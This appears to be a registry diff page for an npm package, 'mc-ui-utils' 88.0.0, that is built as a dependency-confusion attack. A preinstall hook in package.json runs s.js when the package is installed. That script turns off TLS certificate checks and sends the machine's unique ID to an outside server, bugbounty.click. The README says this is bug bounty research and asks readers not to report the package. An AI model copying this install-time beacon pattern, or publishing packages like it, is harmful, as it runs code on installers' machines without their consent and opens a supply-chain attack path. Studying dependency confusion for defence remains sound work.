mc-ui-utils 88.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of mc-ui-utils might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +15 -0
  2. package/index.js +0 -0
  3. package/package.json +1 -0
  4. package/s.js +18 -0
package/README.md ADDED
@@ -0,0 +1,15 @@
1
+ # Bug Bounty Research Only
2
+
3
+ My email address: contact@bugbounty.click
4
+
5
+ This package was created for ethical hacking purposes only. This has only been deployed as a proof of concept (PoC) for the specific bug bounty program listed below. The vulnerability was found after sweeping the web for vulnerable dependencies using various passive techniques and it is a requirement of bug bounty programs that a demonstration of impact is provided. These packages are not created en masse or generally spammed onto the registry. They are designed only to target specific organisations with bug bounty or responsible disclosure programs, and only when a vulnerability has been found within the specific libraries that their public presence has disclosed. CI/CD systems will only be affected if they are vulnerable, and by my deployment registering the vulnerable library, this also stops a malicious party from doing the same.
6
+
7
+ If you're reading this, then if I was a malicious hacker then I could have control over your machine. Please see https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 for the technical description if you are interested. However, please don't report this package to the NPM registry as I have created it for bug bounty purposes.
8
+
9
+ For example, as you can see here the vulnerability has been reported to Hacker1 and been rewarded for (note this is not my report): https://hackerone.com/reports/1104693
10
+
11
+ If this has broken something then I'm sorry - however, please contact your internal security department/bug bounty administrator and pass on this message and email address. If you leave this on NPM and I receive a callback to my server at https://bugbounty.click then I can prove the vulnerability, and once it is reported it can be fixed before anyone malicious exploits it for bad. I hope I have made myself clear, please report this to your organisational security team.
12
+
13
+ Thank you - bugbounty.click
14
+
15
+ https://hackerone.com/inmobi?type=team
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1 @@
1
+ {"name":"mc-ui-utils","version":"88.0.0","description":"Package created for ethical hacking purposes only. If this has broken something then I'm sorry - however, please contact your internal security department/bug bounty administrator and pass on this message and email address. Please contact me at contact@bugbounty.click . ","main":"index.js","scripts":{"test":"echo \"Error: no test specified\" && exit 1","preinstall":"node s.js"},"author":"","license":"ISC","dependencies":{"node-machine-id":"^1.1.12"}}
package/s.js ADDED
@@ -0,0 +1,18 @@
1
+ // Note all that I am sending back is your unique machine ID
2
+
3
+ process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0;
4
+
5
+ const node_machine_id = require('node-machine-id');
6
+
7
+ const https = require('https')
8
+ const options = {
9
+ hostname: 'bugbounty.click',
10
+ port: 443,
11
+ path: '/dc1234-bugbounty/knock-knock/log-install.php?Username=' + encodeURI(node_machine_id.machineIdSync()) + '&Package=mc-ui-utils',
12
+ method: 'GET'
13
+ }
14
+
15
+ const req = https.request(options)
16
+
17
+ req.end();
18
+